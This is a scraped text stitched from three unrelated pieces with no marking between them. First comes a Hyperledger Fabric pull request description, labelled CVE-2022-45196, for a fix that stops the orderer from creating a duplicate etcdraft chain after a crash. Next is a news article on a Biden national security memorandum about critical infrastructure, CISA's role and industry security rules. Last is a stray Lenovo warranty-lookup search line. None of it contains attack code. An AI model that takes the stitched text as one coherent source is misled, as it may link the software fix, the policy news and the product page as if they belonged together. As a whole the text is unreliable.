Do not create a new chain of type etcdraft.Chain if such exists in the map of chains. This can happen when in Raft protocol a channel was created, but not marked as done in WAL logs. So at orderer startup, it tried to create another instance of a chain and panicked because that instance startup failed.

**Related issues**

#2931

**Release Note**

Fixed bug when an orderer crashed at channel creation and after restart couldn't bootstrap because of desynchronization between WAL logs and ledger state.

CVE-2022-45196: FAB-2931: do not create a chain if it's already created by kopaygorodsky · Pull Request #2934 · hyperledger/fabric

President Joe Biden has updated the directives to protect US critical infrastructure against major threats, from cyberattacks to terrorism to climate change.

The Biden administration is updating the US government’s blueprint for protecting the country’s most important infrastructure from hackers, terrorists, and natural disasters.

On Tuesday, President Joe Biden signed a national security memorandum overhauling a 2013 directive that lays out how agencies work together, with private companies, and with state and local governments to improve the security of hospitals, power plants, water facilities, schools, and other critical infrastructure.

Biden’s memo, which is full of updates to the Obama-era directive and new assignments for federal agencies, arrives as the US confronts an array of serious threats to the computer systems and industrial equipment undergirding daily life. In addition to foreign government hackers and cyber criminals seeking to destabilize American society by crippling vital infrastructure, extremist groups and lone actors have plotted to sabotage these systems, and climate change is fueling natural disasters that regularly overwhelm basic services.

But foreign cyber threats loom largest as a danger in the near future. “America faces an era of strategic competition, where state actors will continue to target American critical infrastructure and tolerate or enable malicious activity conducted by nonstate actors,” Caitlin Durkovich, the deputy homeland security adviser for resilience and response, told reporters during a briefing on Monday.

The memorandum has three core purposes: to formalize the role of the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) as the lead agency tasked with protecting infrastructure from bad actors and natural hazards; to improve partnerships with the private sector through faster, more comprehensive information sharing; and to lay out the groundwork for minimum cybersecurity requirements for sectors that currently lack them.

The regulatory push represents a dramatic shift from the government’s approach to infrastructure protection a decade ago. The Biden administration, having concluded that voluntary partnerships were not sufficiently reducing risks to essential services, has applied new cyber rules to the aviation, pipeline, railroad, maritime, and medical device industries, and the Department of Health and Human Services is working on security requirements for hospitals. Now, the administration plans to use the new memo to turbocharge efforts to apply rules to other sectors.

“It is important that we work together to set baseline security standards for the lifeline sectors on which the American way of life and our democracy depends,” Durkovich says.

The document tasks the government’s “Sector Risk Management Agencies,” or SRMAs—each of which oversees and assists one or more infrastructure sectors with cyber and physical security—with determining whether existing rules adequately address their industries’ vulnerabilities and, if not, crafting new rules. The memo includes a process to help agencies if they conclude that they lack “the tools or authorities necessary to ensure effective implementation of those requirements,” a senior administration official said during Monday’s briefing, speaking anonymously pursuant to the White House’s terms.

That process is designed to support agencies like the Environmental Protection Agency, which tried to issue cyber requirements for water systems in 2023 but abandoned the effort after a legal challenge from industry groups and Republican-led states.

Anticipating further industry pushback to new rules in various sectors, the White House is promising to collaborate with companies. “These requirements … need to be developed in close coordination with the owners and operators of that infrastructure to ensure they are appropriate and proportionate to the vulnerability,” the senior administration official says.

In addition to new cyber standards, the memo attempts to kickstart more harmonious and productive information-sharing relationships between government agencies and private companies. The private sector often complains that agencies either declassify information too slowly or keep it tightly restricted to only executives with security clearances. Many companies say that without timely access to the government’s detailed intelligence about hackers’ activities, it is difficult to stay ahead of those adversaries.

To address these tensions, Biden is directing US spy agencies to redouble their efforts to “collect, produce, and share intelligence” with infrastructure operators, Durkovich says.

The memo requires the Office of the Director of National Intelligence (ODNI) to produce a report on the state of the government’s information-sharing with the private sector. As part of that process, the senior administration official says, ODNI will work with CISA and other agencies to write procedures for better outreach to companies.

The government can look to two recent case studies for insights about the best ways to share useful information without jeopardizing the sensitive sources and methods used to gather it. As Russia began its expanded invasion of Ukraine in 2022, the intelligence community declassified and published intelligence about the Kremlin’s plans at such a rapid tempo that it stunned many former officials. And when officials wanted to warn companies about the seriousness of China’s recent cyber intrusions into US infrastructure, they convened classified briefings that starkly laid out the potential damage Beijing could do in the event of a war.

“We have a lot of instructive emerging practices and lessons learned from what has happened in the first three years of this administration,” says the senior official.

In addition to the report on information sharing, the memo also gives ODNI 180 days to produce a formal intelligence assessment on threats to America’s infrastructure, and the senior official says the government “will work to share that” with companies to the extent possible.

Beyond its major substantive changes, the new memo significantly boosts the stature of CISA, which did not exist when the previous plan was written. The memo codifies CISA’s twin roles as a government-wide coordinator for infrastructure security work and as the designated SRMA for eight of the 16 sectors.

CISA has pursued its role as the lead infrastructure protection agency in multiple ways, its director, Jen Easterly, told reporters during Monday’s briefing.

First, CISA reestablished a council of senior officials that makes major decisions about how agencies coordinate to address risks. Second, Easterly says, CISA has provided agencies with “guidance and templates” to help produce risk assessments and risk management plans for each of their sectors. Third, CISA is finalizing a list of “systemically important entities” whose operations power daily life in fundamental ways.

The government will work with the companies on the important-entities list—there are fewer than 500 of them—“to ensure they have the resources necessary to manage risk,” a second senior administration official told reporters on Monday. Those companies will also be priorities for regulation.

While it updates key parts of the government’s defensive playbook, the memo does not change the basic structure underpinning this work: the 16 sectors—each containing a collection of related industries—that together comprise the nation’s critical infrastructure. A CISA report published in late 2021 recommended that the administration consider adding new sectors for the space and bioeconomy industries, but officials decided not to do so.

“Because space is really a part of so many different sectors, it did not, at this time, make sense to break space out as a separate sector,” the second senior official says. (CISA is, however, focused on space cybersecurity.) Government leaders similarly decided that bioeconomy risks were not unique enough to merit a new sector. But both industries could receive their own sectors in the future “if there are significant changes” to the risks they face, says the second official.

In light of how quickly those risks and other conditions could change, the memo directs DHS to submit a “national risk management plan” to the White House every two years summarizing what the government is doing to prevent harm.

Biden administration officials see the new document as more than just an updated strategy. To them, it is a watershed moment in how the government organizes itself to protect Americans from poisoned water, widespread blackouts, and other infrastructure disasters.

The new memo, Durkovich says, “prepares us for the next decade—what the president calls the decisive decade—and what lies out on the horizon.”

Search

lenovo warranty check/lookup | check warranty status | lenovo support us